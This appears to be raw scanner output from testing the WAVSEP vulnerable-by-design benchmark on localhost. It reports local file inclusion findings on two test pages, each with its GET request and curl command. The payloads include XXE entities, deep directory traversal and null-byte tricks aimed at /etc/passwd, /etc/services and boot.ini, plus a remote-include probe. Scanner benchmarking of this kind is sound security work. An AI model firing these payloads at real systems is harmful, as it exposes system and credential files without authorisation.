GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

